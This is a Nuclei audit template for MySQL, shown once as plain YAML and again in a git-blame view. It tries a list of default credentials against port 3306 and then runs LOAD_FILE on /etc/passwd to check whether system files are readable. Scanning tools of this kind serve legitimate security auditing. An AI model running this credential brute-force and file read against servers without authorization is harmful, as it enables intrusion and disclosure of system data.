nuclei-templates/javascript/audit/mysql/mysql-load-file.yaml

id: mysql-load-file
info:
  name: MySQL LOAD_FILE - Enable
  author: pussycat0x
  severity: high
  description: |
    The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
  reference:
    - https://nmap.org/nsedoc/scripts/mysql-databases.html
  metadata:
    shodan-query: port:3306
    verified: true
  tags: js,mysql,network,audit

javascript:
  - code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
      Export(response);

    args:
      Host: "{{Host}}"
      Port: "3306"
      Query: SELECT LOAD_FILE('/etc/passwd')
      User: "{{usernames}}"
      Pass: "{{passwords}}"

    payloads:
      usernames:
        - anonymous
        - root
        - admin
        - mysql
        - nagiosxi
      passwords:
        - SqlServer0
        - root
        - cloudera
        - admin
        - moves
    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - success == true

      - type: word
        words:
          - "root:x:"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[]
Adding new templates from Unreleased Templates Repo 2024-03-09 14:23:42 +00:00			`id: mysql-load-file`
			`info:`
			`name: MySQL LOAD_FILE - Enable`
			`author: pussycat0x`
			`severity: high`
			`description: \|`
			`The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.`
			`reference:`
			`- https://nmap.org/nsedoc/scripts/mysql-databases.html`
			`metadata:`
			`shodan-query: port:3306`
			`verified: true`
mysql -update 2024-03-22 10:10:06 +00:00			`tags: js,mysql,network,audit`
Adding new templates from Unreleased Templates Repo 2024-03-09 14:23:42 +00:00
			`javascript:`
			`- code: \|`
			`let m = require('nuclei/mysql');`
			`let c = m.MySQLClient();`
			`let response = c.ExecuteQuery(Host,Port,User,Pass,Query);`
minor - changes 2024-03-09 18:32:19 +00:00			`Export(response);`
Adding new templates from Unreleased Templates Repo 2024-03-09 14:23:42 +00:00
			`args:`
			`Host: "{{Host}}"`
			`Port: "3306"`
			`Query: SELECT LOAD_FILE('/etc/passwd')`
			`User: "{{usernames}}"`
			`Pass: "{{passwords}}"`

			`payloads:`
mysql -update 2024-03-22 10:10:06 +00:00			`usernames:`
			`- anonymous`
			`- root`
			`- admin`
			`- mysql`
			`- nagiosxi`
			`passwords:`
			`- SqlServer0`
			`- root`
			`- cloudera`
			`- admin`
			`- moves`
			`attack: clusterbomb`
Adding new templates from Unreleased Templates Repo 2024-03-09 14:23:42 +00:00
Update mysql-load-file.yaml 2024-03-09 18:18:37 +00:00			`stop-at-first-match: true`
Adding new templates from Unreleased Templates Repo 2024-03-09 14:23:42 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- success == true`

			`- type: word`
			`words:`
			`- "root:x:"`

			`extractors:`
			`- type: json`
			`part: response`
			`json:`
mysql -update 2024-03-22 10:10:06 +00:00			`- .Rows[]`